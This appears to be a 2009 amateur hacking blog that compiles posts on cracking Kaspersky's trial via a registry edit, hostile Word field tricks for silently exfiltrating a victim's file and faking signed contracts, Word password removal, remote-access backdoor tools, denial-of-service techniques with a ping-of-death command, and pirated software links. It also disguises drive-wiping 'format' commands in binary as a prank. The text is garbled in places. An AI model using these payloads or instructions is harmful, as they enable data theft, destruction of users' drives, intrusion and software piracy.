
Thursday, November 5, 2009
PASSWORD BREAKER

GAME HACK

A SPECIAL TOOLS BY ARUHECK TEAM FOR MY SITE USER THIS TOOLS LETS ACCESS TO PLAY GAMES WITHOUT GRAPHIC CARD...
BYE TO GRAPHIC CARDSSSSSSSSSSSSSSSSSS
http://hotfile.com/dl/9550978/61fcb21/Virtual_Graphic_Card.rar.html
WINDOW MEDIA PLAYER 12

http://letitbit.net/download/2858.2bb716fb23dc60b08c5e515c1/WMPlayer_12_Concept_P.1.b.Wendor_Hack.rar.html
Sunday, October 18, 2009
KASPERSKY HACKING FOR LIFE TIME
KASPERSKY HACKING FOR LIFE TIME100%WORK TESTED
Step 1:Delete license Key.
Step 2: Disable Self-Defense.
Step3:Now exit Kaspersky Internet security/Antivirus 2010,by right clicking the Icon of kaspersky Internet Security/Antivirus 2010 in the taskbar.
Step4: Open Run(Windows key+R),then type regedit and then press Enter.
Now registry editor will open.Now browse to
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyL ab\protected\AVP9\environment(Windows7 x64) ;
HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\protected \AVP9\environment(Windows7 x86)
then select PCID & modify it.After that close registry editor.and modify value data to:
{8F10C22F-6EF6-4378-BAB1-34722F6DE666}
Step5:Open kaspersky Internet security/Antivirus from the start menu. It will prompt to activate license.Click on Activate Trial Version. All done!!!
NOTE:Now it will show that "30 days Remaining".Before completion of this trial period again perform the same steps as discussed above,to get never ending trail version of Kaspersky Internet Security/Antivirus 2010.
hacked by aruj parajuli
Saturday, October 17, 2009
CREATE YOUR OWN ANTIVIRUS FOR FREE
Hello friends these is aruj parajuli .The problem is when i reinstall windows, my id changes fromadmin to admin.windows or administrator.whateverI want %% to be used so that the batchfile can locate theWindows XP directory and my documents and settings folder.
Any help will be appreciated.
*********************************************
copy following code in notepad..and save as aruj.bat and run it
@echo off
if %username% == Administrator.WINDOWS goto admin
REM ** Delete User Files **
rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Recent"rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temp"rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\History\History.ie5"rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temporary Internet Files\content.ie5"
goto end
:adminREM ** Do some extra stuff here **REM ** What ever you want..... **
ECHO You are a Administrator
rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Recent"rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temp"rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\History\History.ie5"rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temporary Internet Files\content.ie5"
REM ** Do more stuff here **REM ** Blah, blah, blah......**
:endexit
MICROSOFT OFFICE HACK
I have stumbled onto a couple potential security issue in MicrosoftWord blogs i would like to share. In both cases the adversary (mis)usesfields to perpetrate the attack. It's important to note that fields are not macros and, as faras I know, cannot be disabled by the user. I am providing a basicdescription along with a proof-of-concept demo. I am fairly certainthat someone with free time and imagination can expand on theseprinciples, possibly applying them to other products.
Following tradition I'll use Hacker and Victim as the two parties involved.Hacker will be the adversary.
1) Document collaboration spyware.
Attack Basics: Hacker sends Victim a Word document for revisions. After Victimedits, saves, and mails it back to Hacker the file will also includecontents of another file(s) from Victim's computer that Hacker hasspecified a priori. To achieve this, Hacker embeds the INCLUDETEXT fieldinto the document. The field results in inclusion of a specified fileinto the current document. Of course, Hacker must be careful include itin such a way that it does not become apparent to Victim. Hacker can do allthe usual things like hidden text, small white font, etc. Alternatively(and in my opinion cleaner, she can embed the INCLUDETEXT field withina dummy IF field that always returns an empty string. In this case, theonly way Victim can notice the included file is if he goes browsingthrough field codes.
Attack Improvements: The disadvantage of the basic attack is that Hackermust rely on Victim to update the INCLUDETEXT field to import the file. Ifthe document is large and contains tables of contents, figures, etc.then Victim is very likely to update all the fields. However, Hacker wouldlike to make sure that the field gets updated regardless of whether Victimdoes it manually or not. Automatic updates can be forced if a DATEfield is embedded into the INCLUDETEXT and it is the last date field inthe document (don't ask me why).
Proof of concept: Inserting the following field structure into thefooter of the last page will steal the contents of c:a.txt on thetarget's computer. Keep in mind the plain curly braces below mustactually be replaced with Word field braces (you can either use themenus to insert fields one by one, or ask google how to do it by hand).
{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\a.txt" "c:\a.txt" } * MERGEFORMAT } = "" "" * MERGEFORMAT }
Countermeasures: The only thing you can do now is decide how paranoidyou want to be. If you must edit and send out a Word file with unknownorigins, you may want to manually go through the fields. It would benice to be able to force user confirmation (via a dialog box) for allincludes. Alternatively one could write a scanner. Of course an optionalstandalone checker will never be used by those most at risk.
2) Oblivious signing
Attack Basics: Hacker and Victim wants to sign a contract saying that Hackerwill pay Victim $100. Hacker types it up as a Word document and bothdigitally sign it. In a few days Victim comes to Hacker to collect hismoney. To his surprise, Hacker presents him with a Word document thatstates he owes her $100. Hacker also has a valid signature from Victim forthe new document. In fact, it is the exact same signature as for thecontract Victim remembers signing and, to Victim's great amazement, the twoWord documents are actually identical in hex. What Hacker did was insertan IF field that branched on an external input such as date orfilename. Thus even though the sign contents remained the same, thedisplayed contents changed because they were partially dependent onunsigned inputs. The basic point is that very few users know the actualcontents of their Word documents and it should be obvious that oneshould never sign what one cannot read. Of course, Victim could contestthe contract in court. An expert witness (that's actually an expert)could easily demonstrate that there are unsigned inputs and thereforeit is not clear which version was actually signed. Thus Victim can get outof the fraudulent contract. However, the same logic will hold for Hackerand she gets away without paying Victim $100 she signed for. Thus, anadversary can build in a free escape clause. Note that I am justspeculating about all the legal aspects.
Proof of concept: Inserting the following field structure at the tailof the document will cause "Hello" to be displayed if the filename is"a.doc" and "Bye" otherwise.
{ IF { FILENAME * MERGEFORMAT { DATE } } = "a.doc" "Hello" "Bye" * MERGEFORMAT }
Update : this flaw has been fixed in office 2003 onwardsbut still works in office 2000 and even sometimes in 2002/03
__________________________________________________________________________
We canconsistently crash Word 2000 using the following method:
1) Open up any text/document editor such as notepad or wordpad2) type a single word (must be a known word, no punctuation).3) highlight the whole word and CTRL+C4) launch word 20005) CTRL+V6) press HOME to take you to the start of the line7) type I8) hit the space bar
This consistenly crashes Word 2000 with the following errormessage:
DDE Server Window: WINWORD.EXE - Application ErrorThe instruction at "0x3076a63e" referenced memory at "0x00000000". Thememory could not be "read".
Vulnerability:
remove office passwordsVulnerable:
MS Word (Win2K/XP)
Example 1
1) Open MS Word with a new/blank page
2) Now select "Insert" >> "File" >> browse for your password protected doc & select "Insert" & "Insert" password protected doc into your new/blank doc
3) Now select "Tools" & Whey hey, voila, there's no longer an "Unprotect document" ... password vanished ...
Example 2
1) open your password protected doc in MS Word i.e. you can't edit protected fields (apparently)
2) Save as a Rich Text Format (RTF) & keep this RTF file open in MS Word (YES, keep open)
3) Whilst your new RTF file is open in MS Word, go "File open" & find your newly saved RTF file & open (YES, you DO need to do 'tis even though you already have it open)
4) If prompted to revert say YES, if not prompted stay calm. Now in your MS Word menu go & "Unprotect document", amazingly, voila, you don't get prompted for a passwor
Friday, October 16, 2009
SECRETS OF PROGRAM
There is a general misconception about security today. Most people would love to believe that their firewalls are completely capable to protect them from anything indecent. The sad part, they could not be more wrong. Hungry Hacker aim to prove it with three separate programs that can compromise the security of computers. You have the opportunity to say “What’s a backdoor?” Yes, these programs were created in 1990, but still pose a real threat today. It is the first two that are still being developed.
Using these programs any noob can remotely access your computer without any Authentication and do whatever he wants. I will tell you some of the features rest of them you need to try it and find out. These Programs :Work as a key logger.Send any Information from Victim’s PC to the Hacker’s PC.Run any program on the Victims PC.Display any Violating Image on victim’s Screen.Open the CD Drive of the Victim’s PC.Open any Web page on the Victims Screen.Disable any Specific Key or whole Keyboard.Shutdown Victim’s PC.Start a Song on the Victim’s PC.etc.etc…………..
Back Orifice / Back Orifice 2000
Back Orifice is one of the most common backdoor programs, and one of the most deadly. The name may seem like a joke, but sure, the threat is real. Back Orifice was established in Cult of the Dead Cow group. Back Orifice is an Open Source Program. The main Threat of this software is that by making some changes in the code anybody can make it undetectable to the Anti virus Program running on the Victim’s computer. Apart from the strange title, the program usually gets port 31337, the reference to “Lit” phenomenon is popular among hackers.
Back Orifice uses a client-server model, while the server and client is the victim attacker. What makes Back Orifice so dangerous that it can install and operate silently. There is not required interaction with the user in, meaning you could its on your computer right now, and do not know.
Companies such as Symantec have taken steps to protect computers against programs that they consider dangerous. But even more attacks using Back Orifice 2000. This is due partly to the fact that it is still evolving, as open source. As stated in the documentation the goal is ultimately the presence of the Back Orifice 2000 unknown even to those who installed it.
Back Orifice 2000, developed for Windows 95, Windows 98, Windows NT, Windows 2000 and Windows XP.
Where can I download Back orifice 2000?
Back Orifice 2000 can be downloaded at the following address: http://sourceforge.net/projects/bo2k/
I infected! How do I remove it?
Removing Back Orifice 2000 may require that you change the registry settings. To remove it at 7 simple steps, refer to the diagram below.
How do I delete Back orifice 2000Click Start> Run, and type “Regedit”(without the quotes)Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices “Now looking in the right box: “The umgr32 = ‘c: \ windows \ system \ umgr32.exe”Right-click on this entry and click Remove. Now restart your computer.After restarting only open Windows Explorer. Make sure you can see all registered extensions. To do so, select “View Options and configure the appropriate settings.Go to the WINDOWS \ SYSTEM directory, and find “umgr32.exe” file. Once you find it, delete it.Exit Windows Explorer and reboot again.
NetBus / Netbus 2.0 Pro
NetBus was established around the same time that the Back Orifice was in the late 1990’s. NetBus was originally designed as a program prank friends and family, of course anything too malicious. However, the program was released in 1998, and is widely used as a backdoor to manage computer.
Like the Back Orifice, NetBus allows attackers to do virtually everything in the computer victim. It also works well under Windows 9x systems, as well as Windows XP. Unlike Back Orifice, the latest version of NetBus regarded shareware is not free. NetBus is also implementing less stealthy operations, as a direct result of criticism and complaints of abusive use.
Where can I buy and download NetBus?
NetBus can be purchased and downloaded at the following address: http://www.netbus.org/
Ok, I am infected. Now what?
Fortunately, the latest version of NetBus is a valid program. It can be removed just like any other program. Previous issuance NetBus is a bit more tricky, however. If you are not lucky enough attacked with the latest version, the withdrawal process and in the Back Orifice.
How do I remove NetBus?Click Start> Run, and type “Regedit ‘(without the quotes)Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices “Now, in the right box, looking as follows: “[Name_of_Server].”Exe Of course, you have to find the actual name of this file EXE-. Usually This” Patch.exe ‘or’ SysEdit.exe “, but may vary.Reboot and remove all traces of the actual program, which can be left. Additionally, you can set yourself NetBus, and then use its own function disposal.
SubSeven / Sub7
SubSeven or Sub7, has been established for the same purpose was to NetBus pranks. Sub7 actually has more support for pranks, and has more advanced users. Sub7 also widely used by the script kiddies, although that many firewalls and anti-virus software before initialization.
Since Sub7 not supported for several years, the threat is usually very low. Most security programs will not have any problem in ending Sub7 before it has a chance to be started. This shows that the importance to the modernization and security programs is critical, because the money was still there.
Nevertheless, it is widely used by those who have physical access to your firewall, or security programs. If access rights, the tool will work without restrictions.
Where can I buy and download Sub7?
Sub7 not supported more, and hence is not available for download on any legitimate websites. If you were to make a Google search, you would find links to download Sub7. However, this is not the official site, and should be considered dubious and dangerous.
Sounds harmless, How do I remove it?End of the following processes through the curator: “editserver.exe, subseven.exe”Delete the following files: “editserver.exe, subseven.exe, tutorial.txt.”
Why these programs is absolutely legitimate?
All the basis behind these programs is that they are designed to help people, not harm. While some like NetBus really were originally created for pranks, they switched routes to avoid legal problems.
These programs claim to be the legitimate remote desktop program, although they certainly easily used for malicious use. These programs really should be used to aid or customer support departments. Why all adolescents is to copy these programs goes beyond us, but leave the content of their networks, while computer is a good idea.
The advent of new technology has made these programs in some respects less effective. However, programs such as Back Orifice 2000, yet still evolving, so do not be surprised to learn that he works in the background, waiting for instructions. Since the best defense is a good offense, be sure to save a sharp eye on what is installed on the network computers. After all, an ounce of prevention is worth a pound of cure.
* HOW NOT TO GET HACKED
Protect Urself !Follow These Simple Guidelines n u are done
1. Stop using Internet Explorer and make the switch to Opera, it's more secure, plain and simple.
2. Get Spybot Search and Destroy or Spyware Doctor and immediately update it.
3. Get Adaware SE and immediately update it. (Use both as a 1-2 punch on infected client computers and between the two there's not much they won't kill)
4. Update your anti virus
5. Boot into safe mode and run all three scans
6. While the scans are going check your registry (Click start --> Run and type regedit to get intot he registry) and look in HKEY_CurrentUser/software/microsoft/windows/currentversion/run & HKEY_Local_Machine/software/microsoft/windows/currentversion/run. Verify that all programs listed are legitimate and wanted.
7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it.
8. Use explorer to go to the windows/system32 folder and sort by date. If you haven't already done so, make sure you can see the entire file names. click Tools --> Folder Options and unclick the box labeled "Hide extensions for known file types" and under Hidden files and folders click "Show hidden files and folders." However, make sure you choose "Hide protected operating system files" so you don't accidentally remove anything that would cripple your computer.. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe.
9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can't get a clean scan in regular mode then you have something more persistant that could take more research.
10. Make sure your firewall doesn't have strange exceptions.
11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your passwords.
12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows.
Good luc
FORMATTING HDD WHILE WINDOWS
IF u think u cannot format c drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary codeformat c:\ /Q/X -- this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X -- this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X -- this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
HACKING TOOLS COLLECTION

ITS ABSOLUTE FREE & EASY TO DOWNLOAD, TO DOWNLOAD CLICK "READ MORE" AND U WILL GET DOWNLOAD BUTTON BELOW ...Features:
http://rapidshare.com/files/34738681/IMC_Tool_Set.zipANOTHER LINK IS;-http://rapidshare.com/files/57355491/IMC_Tool_Set.zipCAUTION ;- PLS LOGG OFF U R AUTOMATIC UPDATE PROTECTION OF U R ANTI VIRUS SOFTWARE WHEN U INSTALIZATION OTHERWISE U R NOT ABLE TO DOWNLOAD SPECIALLYU HAD KASPERSKY.ENJOY !
LOCK THE FOLDER WITHOUT ANY SOFTWARE

FOLDER LOCK WITHOUT ANY SOFTWARE........FOR THOSE WHO ARE NOT KNOWING♠FIRST GO TO NOTEPAD AND WRITE THE BELOW CODE AND SAVE IT'S EXTENSION AS .bat THAT IS IT IS BATCH FILEif EXIST
JAVA HACKING
Edit any web page..
Go to the page you want to editCopy the below code into the url bar.javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0Hit go! the links will have turned a more saturated blue, and when you click somewhere you'll be able to edit text..Feel free to edit whatever you want on the page & u can save that page..Note: It doesn't work on orkut pages because of Main#.I know that this is Old , but i also know that Old is GoldLets see i edited google page
USE SOFTWARE FOREVER
Now we download stuff almost daily. New products pop out so often. You can use any software forever you want. You can download trial version, right. Trial version expires after some days. You can stop that expiration. You can tell trial version of the software to not count days or do not bother about time. The software will stay and keep working like original software forever and will not expire or cease to work. You do not have to change your system clock. This little software does it all.Time Stopper is the software which can stop the time for try out version software. When you stop the time you can use your try-out versions forever. When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time and date run normally on your system. You can use any number of try-out version softwares with this software.How it Works1. Open Time Stopper2. Browse and select .exe of required trial software3. Choose the new date (Any date which occurs in between your trial software time period before expiration, suggestion: set it to two days before trial software expiration date.)4. Choose any time5. Click open software on your selected dateIf you wish to create an icon for your modified trial software and do not want to open Time stopper every time then use last button in software to create new icon. open that trial software after that from that newly created icon always otherwise it can expire.This is 100% free and 100% legal!!Download linkif u like this make some comments... : )
ACCESS DATA OF PASSWORD PROTECTED USER IN WHICH PC FAIL TO BOOT
You may come across a situation in which your windows XP PC fails to reboot, and the most accepted solution to that problem is to re-format the Hard Disk. Before formatting, you should backup your files. If your computer is password protected, you won't be able to access them from outside, so here is a method for getting around this.Steps Boot the machine from Windows XP bootable CD. At the setup screen, select R to repair using Recovery Console. Now the console program will prompt you to select the Windows folder (eg. C:WINDOWS) where the Windows is installed (you need to enter a number from the list of folders shown to you).Type 'HELP' (without single quotes) and press enter for available commands. This is like a DOS program, but some features are not available.Change the current directory to the user's directory where you want to backup. Type 'CD "C:Documents and SettingsX"' (without single quotes) and press enter. Where X is the username. Now the current directory will change to "C:Documents and SettingsX". Now change the directory to Desktop by entering 'CD Desktop' (without single quotes) and press enter to go to the desktop folder.Type 'DIR' (Without single quotes) and press enter, you will be listed all the available files in Desktop. Type 'COPY a.doc D:BACKUP' (without quotes) and press enter, where a.doc is a file available in Desktop and the folder D:BACKUP available to copy the files.As in step 7,8,9,10 you can backup other folders like "My Documents", "My Music", etc. Note that you cannot use wildcards for COPY. I.e, you cannot copy all the files in a folder at once. You must copy one file by one.Tips Before doing this, try changing the password to blank so that you can access the data from another machine to easily drag and drop to copy your data.Warnings Any data not backed up will be permanently deleted when you re-format the hard drive, so make sure you back up any thing you want to keep.Things You'll Need A bootable Windows XP CD
Thursday, October 15, 2009
DOS ATTACK
A denial of service attack (DOS) is when an attacker can make a system unusable or significantly slow for legitimate users by overloading the resources, so that no one can access it. If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine by using denial of service attack. Do) is an attack designed to render a computer or network incapable of providing normal services. The most common DoS attacks will target the computer's network bandwidth or connectivity. Bandwidth attacks flood the network with such a high volume of traffic, that's all available network resources are consumed and legitimate user requests cannot get through. Connectivity attacks flood a computer with such a high volume of connection requests, that all available operating system resources are consumed and the computer can no longer process legitimate user requests. Not all service outages, even those that result from malicious activity, are necessarily denial-of-service attacks. Other types of attack may include a denial of service as a component, but the denial of service may be part of a larger attack. Illegitimate use of resources may also result in denial of service. For example, an intruder may use of an anonymous ftp area as a place to store illegal copies of commercial software, consuming disk space and generating network traffic. A denial of service attack can also destroy programming and files in a computer system. Although usually intentional and malicious, a denial of service attack can sometimes happen accidentally. A denial of service attack is a type of security breach to a computer system that does not usually result in the theft of information or other security loss.
DOS Attacks are of the following different types-:1. Those that exploit vulnerabilities in the TCP/IP protocols suite.2. Those that exploit vulnerabilities in the Ipv4 implementation.3 There are also some brute force attacks, which try to use up all resources of the target system and makethe services unusable.Before I go on with DOS attacks, let me explain some vulnerabilities in TCP/IP itself. Some common vulnerabilitiesare Ping of Death, Teardrop, SYN attacks and Land Attacks.Ping of DeathThis vulnerability is quite well known and was earlier commonly used to hang remote systems (or even force them toreboot) so that no users can use its services. This exploit no longer works, as almost all system administrators wouldhave upgraded their systems making them safe from such attacks.In this attack, the target system is pinged with a data packet that exceeds the maximum bytes allowed by TCP/IP,which is 65 536. This would have almost always caused the remote system to hang, reboot or crash. This DOS attackcould be carried out even through the command line, in the following manner:
The following Ping command creates a giant datagram of the size 65540 for Ping. It might hang the victim'scomputer:C:\windows>ping -l 65540TeardropThe Teardrop attack exploits the vulnerability present in the reassembling of data packets. Whenever data is beingsent over the Internet, it is broken down into smaller fragments at the source system and put together at thedestination system. Say you need to send 4000 bytes of data from one system to the other, then not all of the 4000bytes is sent at one go. This entire chunk of data is first broken down into smaller parts and divided into a number ofpackets, with each packet carrying a specified range of data. For Example, say 4000 bytes is divided into 3 packets,then:The first Packet will carry data from 1 byte to 1500 bytesThe second Packet will carry data from 1501 bytes to 3000 bytesThe third packet will carry data from 3001 bytes to 4000 by tesThese packets have an OFFSET field in their TCP header part. This Offset field specifies from which byte to whichbyte does that particular data packet carries data or the range of data that it is carrying. This along with the sequencenumbers helps the destination system to reassemble the data packets in the correct order. Now in this attack, a seriesof data packets are sent to the target system with overlapping Offset field values.
As a result, the target system is notable to reassemble the packets and is forced to crash, hang or reboot.Say for example, consider the following scenario-: (Note: _ _ _ = 1 Data Packet)Normally a system receives data packets in the following form, with no overlapping Offset values._ _ _ _ _ _ _ _ _(1 to 1500 bytes) (1501 to 3000 bytes) (3001 to 4500 bytes)Now in a Teardrop attack, the data packets are sent to the target computer in the following format:_ _ _ _ _ _ _ _ _(1 to 1500 bytes) (1500 to 3000 bytes) (1001 to 3600 bytes)When the target system receives something like the above, it simply cannot handle it and will crash or hang or reboot.SYN AttackThe SYN attack exploits TCP/IP's three-way handshake. Thus in order to understand as to how SYN Attacks work,you need to first know how TCP/IP establishes a connection between two systems. Whenever a client wants toestablish a connection with a host, then three steps take place. These three steps are referred to as the three-wayhandshake.In a normal three way handshake, what happens is that, the client sends a SYN packet to the host, the host replies tothis packet with a SYN ACK packet. Then the client responds with a ACK (Acknowledgement) packet. This will beclearer after the following depiction of these steps-:
1. Client --------SYN Packet--------------à HostIn the first step the client sends a SYN packet to the host, with whom it wants to establish a three-way connection.The SYN packet requests the remote system for a connection. It also contains the Initial Sequence Number or ISN of the client, which is needed by the host to put back the fragmented data in the correct sequence.2. Host -------------SYN/ACK Packet----------à ClientIn the second step, the host replies to the client with a SYN/ACK packet. This packet acknowledges the SYN packetsent by the client and sends the client its own ISN.3. Client --------------ACK-----------------------à HostIn the last step the client acknowledges the SYN/ACK packet sent by the host by replying with a ACK packet.These three steps together are known as the 3-way handshake and only when they are completed is a complete TCP/IP connection established.In a SYN attack, several SYN packets are sent to the server but all these SYN packets have a bad source IP Address.When the target system receives these SYN Packets with Bad IP Addresses, it tries to respond to each one of themwith a SYN ACK packet. Now the target system waits for an ACK message to come from the bad IP address.However, as the bad IP does not actually exist, the target system never actually receives the ACK packet. It thusqueues up all these requests until it receives an ACK message. The requests are not removed unless and until, theremote target system gets an ACK message. Hence these requests take up or occupy valuable resources of the targetmachine.To actually affect the target system, a large number of SYN bad IP packets have to be sent. As these packets have aBad Source IP, they queue up, use up resources and memory or the target system and eventually crash, hang orreboot the system.
Land AttacksA Land attack is similar to a SYN attack, the only difference being that instead of a bad IP Address, the IP address ofthe target system itself is used. This creates an infinite loop between the target system and the target system itself.However, almost all systems have filters or firewalls against such attacks.Smurf AttacksA Smurf attack is a sort of Brute Force DOS Attack, in which a huge number of Ping Requests are sent to a system (normally the router) in the Target Network, using Spoofed IP Addresses from within the target network. As andwhen the router gets a PING message, it will route it or echo it back, in turn flooding the Network with Packets, andjamming the traffic. If there are a large number of nodes, hosts etc in the Network, then it can easily clog the entirenetwork and prevent any use of the services provided by it.Read more about the Smurf Attacks at CERT: http://www.cert.org/advisories/CA-98.01.smurf.htmlUDP Flooding
This kind of flooding is done against two target systems and can be used to stop the services offered by any of thetwo systems. Both of the target systems are connected to each other, one generating a series of characters for eachpacket received or in other words, requesting UDP character generating service while the other system, echoes allcharacters it receives. This creates an infinite non-stopping loop between the two systems, making them useless forany data exchange or service provision.Distributed DOS AttacksDOS attacks are not new; in fact they have been around for a long time. However there has been a recent wave ofDistributed Denial of Services attacks which pose a great threat to Security and are on the verge of overtakingViruses/Trojans to become the deadliest threat to Internet Security. Now you see, in almost all of the above TCP/IPvulnerabilities, which are being exploited by hackers, there is a huge chance of the target's system administrator orthe authorities tracing the attacks and getting hold of the attacker. Now what is commonly being done is, say a group of 5 Hackers join and decide to bring a Fortune 500 company'sserver down. Now each one of them breaks into a smaller less protected network and takes over it.
So now they have5 networks and supposing there are around 20 systems in each network, it gives these Hackers, around 100 systemsin all to attack from. So they sitting on there home computer, connect to the hacked less protected Network, install aDenial of Service Tool on these hacked networks and using these hacked systems in the various networks launchAttacks on the actual Fortune 500 Company. This makes the hackers less easy to detect and helps them to do whatthey wanted to do without getting caught. As they have full control over the smaller less protected network they caneasily remove all traces before the authorities get there.Not even a single system connected to the Internet is safe from such DDOS attacks. All platforms Including Unix,Windows NT are vulnerable to such attacks. Even MacOS has not been spared, as some of them are being used toconduct such DDOS attacks.Don't skip any line if you did not understand... try your best to understand the concept. there is no shortcut for success, you have to work hard !!!
ALL SOFTWARE COLLECTION
PC TOOLS SOFTWAREDesktop Maestro v2.0.0.332File Recovery v6.2.0.16Firewall Plus v3.0.0.60Internet Security 2008Privacy Guardian v4.1.0.37Registry Mechanic v7.0.0.1010Spam Monitor v3.0.0.4Spyware Doctor v5.5.0.204Spyware Doctor with AntiVirus v5.5.204ThreatFire v3.0.14.16AntiVirus v3.6.0.34Download 138mb:http://rapidshare.com/files/98612139/PC_Tools_Software_AiO_-_baseball2525.isohttp://rapidshare.com/files/98612163/PC_Tools_Software_AiO_-_baseball2525.part1.rarhttp://rapidshare.com/files/98612157/PC_Tools_Software_AiO_-_baseball2525.part2.rarScan Before Installing
Utilities DVD 2008
Anti-Spyware* Ad-Aware 2007 Pro 7.0.2.6* HijackThis 2.0.2* Spy Sweeper 5.5.7.48* Spybot Search & Destroy 1.5.2* Spyware Blaster 3.5.1* Spyware Doctor 5.5.0.204* SUPERAntiSpyware Professional 4.0.0.1146Anti-Virus* AVG Anti-Virus 8 Pro* BitDefender Total Security 2008 v11.0.15* ESET NOD32 Antivirus 3.0.636.0* ESET NOD32 Smart Security 3.0* Kaspersky Internet Security 7.0.1.325* McAfee Total Protection 2008* Panda Antivirus 2008* Panda Internet Security 2008* Symantec Norton 360* ZoneAlarm Security Suite 7.0.462Applications* Acronis True Image 11 Build 8053 Home* Adobe DreamWeaver CS3 v9.0* Adobe Photoshop CS3 v10.0* Adobe Reader 8.1.2* CCleaner 2.0.5* Everest Ultimate Edition v4.20.1291b* FastStone Image Viewer 3.5* Google Earth Pro 4.2.205* IrfanView 4.10* Partition Magic 8 Pro* Picasa 2.7.37.36* Registry Booster 2.0.1107* Registry Mechanic 7.0.0.1010* Stardock - CursorXP- ObjectBar 2.1- ObjectDock Plus v1.90- SkinStudio Pro- WindowBlinds 6.0* WinImage 8.10.8100* Xplorer2 Pro 1.7.0.5
Audio & Video* iTunes 7.6.1* MusicMatch 10.00.4033* QuickTime Player 7.4.1.14* RealPlayer 11.0.0.431 Beta* VLC Media Player 0.8.6d* Winamp 5.52* Windows Media Player 11CD & DVD Tools* Alcohol 120% 1.9.7.6022* Ashampoo Burning Studio 7.21* CloneCD 5.3.0.1* CloneDVD 2.9.1.5* ConvertXtoDVD 2.2.3.258* CyberLink PowerDVD Ultra Deluxe 7.3.3516* DAEMON Tools Pro 4.10.218.0* DeepBurner 1.8.0.224* DVD Shrink 3.2* MagicISO 5.4.239* Nero Ultra Edition 8.2.8.0* PowerISO 3.9Chat* AIM 6.8.1.5 Beta* ICQ 6.0.6043* Pidgin (Gaim) 2.3.1* Trillian Pro 3.1.9.0* Windows Live Messenger 8.5.1302* Yahoo! Messenger 9.0.0.907 BetaCodecs* All in 1 Codecs 6.0.3.0* DivX Pro 6.8.0.19* K-Lite Codec Pack 3.75 Full* K-Lite Mega Codec Pack 3.7.0* Matroska Pack Full v1.1.2* QuickTime Alternative 2.4.0* RealPlayer Alternative 1.7.5* Vista Codec Package 4.5.8* XP CodecPack 2.3.4Data Compression* 7-Zip 4.57* WinACE 2.61* WinRAR 3.71* WinZIP 11.1
EXTRAS* GMail Account HDD 1.0.0.12* Hacha 3.5* Magical Jelly Bean KeyFinder 2.0.4* nVidia Drivers - WinXP 169.21- WinVista 169.25* Recuva 1.10.223* Unlocker 1.8.5* Your Uninstaller Pro 2008Firewalls* Agnitum Outpost Firewall Pro 2008* Comodo Firewall 3.0.18.309* ZoneAlarm Pro 7.0.462.0Internet* Ares 2.0.9* BitTorrent 6.0.2* Download Accelerator Plus 8.6.1.4* eMule 0.48a* Google Toolbar 5.0.1112.7760 (IE)* Kazaa 3.2.5* LimeWire Pro 4.17.1.1* uTorrent 1.7.7Internet Browsers* Avant Browser 11.5.21* Firefox 2.0.0.12* Internet Explorer 7.0.5730.13* Netscape Navigator 9.0.0.6* Opera 9.26* Safari 3.0.4 BetaService Packs* Windows VISTA x32 Service Pack 1 (KB936330) - ENG* Windows XP Service Pack 2 (KB835935) - ENG
System Tools*.NET Framework - Version 1.1- Version 2.0 SP1- Version 3.5* DirectX 9.0c (Nov 2007)* Flash Player 9.0.115.0* Java Runtime Environment 1.6.0.4* Shockwave Player 10.3.0.24Windows* Remove WGA* VISTA Tweaks (.Docx)* Windows Activation - Windows Vista x32 - Activator Bootloader for SP1- OEMTool- Windows XP ProDownload: 3.26 GB-ISO 3.64GB
